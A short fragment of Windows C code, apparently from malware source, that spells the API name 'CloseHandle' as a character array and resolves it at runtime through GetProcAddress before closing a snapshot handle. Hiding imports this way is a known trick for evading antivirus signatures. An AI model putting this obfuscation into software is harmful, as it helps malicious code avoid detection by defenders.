lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
pCloseHandle(hSnapshot);
return lpBuffer;
}
